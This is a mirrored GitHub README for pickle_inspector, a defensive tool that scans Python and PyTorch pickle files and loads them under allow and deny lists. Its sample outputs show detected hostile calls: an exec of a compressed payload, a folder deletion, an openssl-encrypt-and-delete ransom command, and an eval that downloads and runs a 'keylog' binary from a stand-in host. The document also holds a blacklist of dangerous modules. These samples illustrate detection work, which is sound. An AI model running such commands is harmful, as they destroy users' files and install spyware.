Git Product home page Git Product logo

pickle_inspector's Introduction

pickle_inspector 🥒🔬

Check what is in the pickle before eating it.

  1. About
  2. Command line usage
  3. Library usage
  4. Controlled unpickling
  5. Black- and whitelists
  6. Acknowledgements

About

  • Trace calls and imports that would occur if a pickle had been loaded
  • Flat but detailed call graphs
  • Load malicious pickles by skipping blacklisted items
  • Library and script usage
  • Combination of black and whitelists for fine grained control
  • Can be used with pytorchs load function

It works on any type of pickle, but was made with torch in mind.

NOTE: torch == 1.13.0 breaks using custom unpicklers, see pytorch/pytorch#88438
This is fixed in torch 1.13.1 and 2.x.x.

Scanning pickles via command line

tl;dr just let me scan my pickles. Using a preset blacklist for arbitrary code execution

python scan_pickle.py -f exec -i pickled.pkl
> Using blacklist: exec
> Scanning file(s): ['pickled.pkl']
> Using black list: ['__builtin__.breakpoint', '__builtin__.open', 'requests.*', 'builtins.open', '__builtin__.compile', 'socket.*', 'builtins.breakpoint', 'os.*', 'nt.*', 'builtins.eval', 'webbrowser.*', '__builtin__.eval', 'builtins.exec', 'posix.*', '__builtin__.exec', '__builtin__.getattr', 'builtins.getattrsubprocess.*', 'builtins.compile', 'aiohttp.*', 'httplib.*', 'sys.*']
> Reading pickled.pkl
> Scanning: pickled.pkl
> found: __builtin__.exec
> found: zlib.decompress
>
> Found blacklisted items:
>
>   __builtin__.exec.__call__((zlib.decompress((b'x\xda5\xcd]\n\xc3 \x10\x04\xe0\xf7\x9cb\xd9\x17\x15$\x07\x08x\x87\xde@$\xac\xe9R\xff\xd0\r\t\x94\xde\xbdB\xe9<}\x0c\x0c\x13{\xcd\x90\xcf$\xdcz\xddi\x0c.\x07pn\xb5\x0b<~\xcd\xd2\xc0\xfd\xad%\xf4\x83\xc4\xd1M\xbb\x85\xe9\xe14"^,O\xa8\x8d\x8aV\xa9\xa6UnQ\x16\xd4\xa5\x0c\x84\x01q[`\xa6u.\xa21\x9e\xfb\x0b-DN\xe4\xa2\x99[\xfbF\xefK\xc8\xe4=n\x939p\x99\xfcX0fi\xeb\x98\x8f\xa2\xcd\x17\x1d%6\xbc',), {}),), {})
>
> Scan for pickled.pkl FAILED ⚠️

Using a preset whitelist for a stable diffusion checkpoint

python scan_pickle.py --preset stable_diffusion_v1 --in sus.ckpt
> Using whitelist: stable_diffusion_v1
> Scanning file(s): ['sus.ckpt']
> Using white list: ['collections.OrderedDict', 'torch._utils._rebuild_tensor_v2', 'torch.HalfStorage', 'torch.FloatStorage', 'torch.IntStorage', 'torch.LongStorage', 'pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint', 'numpy.core.multiarray.scalar', 'numpy.dtype', '_codecs.encode']
> Reading sus.ckpt
> Found pickle in zip: archive/data.pkl
> Scanning: archive/data.pkl
> found: torch._utils._rebuild_tensor_v2
> found: torch.FloatStorage
> found: collections.OrderedDict
> found: torch.IntStorage
> found: torch.LongStorage
> found: pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint
> found: numpy.core.multiarray.scalar
> found: numpy.dtype
> found: _codecs.encode
>
> Scan for sus.ckpt PASSED ✅

Script usage

usage: scan_pickle.py [-h] -i INPUT [INPUT ...]
                      [-p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]]
                      [-f {exec} [{exec} ...]] [-w WHITELIST [WHITELIST ...]] [-b BLACKLIST [BLACKLIST ...]]

Scan pickles

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT [INPUT ...], --in INPUT [INPUT ...]
                        path to a pickle(s) or zip(s) containing pickles
  -p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...], --preset {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]
                        a whitelist preset to use
  -f {exec} [{exec} ...], --preset_blacklist {exec} [{exec} ...]
                        a blacklist preset to use
  -w WHITELIST [WHITELIST ...], --whitelist WHITELIST [WHITELIST ...]
                        whitelist of modules and functions to allow
  -b BLACKLIST [BLACKLIST ...], --blacklist BLACKLIST [BLACKLIST ...]
                        blacklist of modules and functions to block

Inspecting

Inspect without unpickling.

import torch
import pickle_inspector
result = torch.load('sus.pt', pickle_module=pickle_inspector.inspector)
for c in result.imports:
    print(c)

notice calls to shutil.rmtree, os.system or similar

> shutil.rmtree
> torch._utils._rebuild_tensor_v2
> collections.OrderedDict
> numpy.core.multiarray.scalar
> os.system
> numpy.dtype
> _codecs.encode

so we are taking a closer look at what is being called

for c in result.calls:
    print(c)

and it seems like someone tried to delete something and ransom a file

> shutil.rmtree(('/very/important/folder'), {})
> collections.OrderedDict((), {})
> torch._utils._rebuild_tensor_v2((None, 0, (1000,), (1,), False, collections.OrderedDict((), {})), {})
...
> torch._utils._rebuild_tensor_v2((None, 0, (), (), False, collections.OrderedDict((), {})), {})
> os.system(('openssl enc -aes-128-ecb -in important_file -out give_money.enc -K 1337B00B135DEADBEEF; rm important_file'), {})
> numpy.dtype(('f8', False, True), {})
> numpy.dtype.__setstate__(((3, '<', None, None, None, -1, -1, 0),), {})
> _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})
> numpy.core.multiarray.scalar((numpy.dtype(('f8', False, True), {}), _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})), {})

Controlled unpickling

Inspect and unpickle using white and blacklists.

import torch
from pickle_inspector import UnpickleConfig, UnpickleControlled, PickleModule
config = UnpickleConfig()
# only allow  modules, classes and funcions in the whitelist
# the rest will be stubbed
config.whitelist = [
        'torch._utils._rebuild_tensor_v2',
        'torch.FloatStorage',
        'torch.IntStorage',
        'torch.LongStorage',
        'numpy.core.multiarray.scalar',
        'numpy.dtype',
        'collections.OrderedDict',
        '_codecs.encode'
]
result = torch.load('model.ckpt', pickle_module = PickleModule(UnpickleControlled, config))

# Use the state_dict as usual
state_dict = result.structure
# ...

# print import results
for c in result.imports:
    print(c)
> torch._utils._rebuild_tensor_v2
> torch.FloatStorage
...
> __builtin__.eval
> collections.OrderedDict
...
for c in results.calls:
    if 'eval' in c:
        print(c)
> __builtin__.eval('import os;os.system("wget https://sus.to/keylog;chmod +x keylog;./keylog &")')

Blacklist & Whitelist

  • Whitelist only: everything will be blocked except items in the whitelist
  • Blacklist only: everything will be allowed except items in the blacklist
  • Both black- and whitelist: everything in the blacklist will be blocked except items in the whitelist

Example: Block everything within torch except torch.FloatStorage

conf.blacklist = ['torch.*']
conf.whitelist = ['torch.FloatStorage']

Whitelist for stable diffusion

A premade whitelist for stable diffusion v1 and v2 is available in this project.

Example: Scan a stable diffusion v1 checkpoint

import torch
from pickle_inspector import UnpickleConfig, PickleModule, UnpickleInspector, importlists
conf = UnpickleConfig(whitelist = importlists.stable_diffusion_v1)
torch.load('sd-v1-4.ckpt', pickle_module=PickleModule(UnpickleInspector, conf))

Tested with python 3.9 and torch 1.12.1


Acknowledgements


Copyright (C) 2023 Lopho <[email protected]>
Licensed under the AGPLv3 <https://www.gnu.org/licenses/agpl-3.0.html>

pickle_inspector's People

Contributors

lopho avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

pickle_inspector's Issues

ValueError: unsupported pickle protocol: 181

Hello, while scanning a model resulting from a custom merge I got the following error :

Copyright (C) 2022 Lopho <[[email protected]](mailto:[email protected])> | Licensed under AGPLv3 <https://www.gnu.org/licenses/agpl-3.0.html>
Using preset: stable_diffusion_v1
Scanning file(s): ['/content/drive/MyDrive/AI_MODELS/AshOmeletteWithBurnedPepper.ckpt']
Using white list: ['pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint', 'numpy.core.multiarray.scalar', 'torch.IntStorage', '_codecs.encode', 'torch.FloatStorage', 'torch.HalfStorage', 'torch._utils._rebuild_tensor_v2', 'torch.LongStorage', 'collections.OrderedDict', 'numpy.dtype']
Reading /content/drive/MyDrive/AI_MODELS/AshOmeletteWithBurnedPepper.ckpt
Found pickle in zip: archive/data.pkl
Found pickle in zip: archive/data/244
Scanning: archive/data.pkl
found: torch._utils._rebuild_tensor_v2
found: torch.FloatStorage
found: collections.OrderedDict
Scanning: archive/data/244
Traceback (most recent call last):
  File "scan_pickle.py", line 144, in <module>
    sys.exit(main(sys.argv[1:]).value)
  File "scan_pickle.py", line 136, in main
    result = scan(p, stubPickle)
  File "scan_pickle.py", line 57, in scan
    pickle_module.Unpickler(data[k]).load()
  File "/content/pickle_inspector/pickle_inspector/_pickle_inspector.py", line 134, in load
    result.structure = super().load()
ValueError: unsupported pickle protocol: 181

link to the model if you want to test by yourself.

Best Regards

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.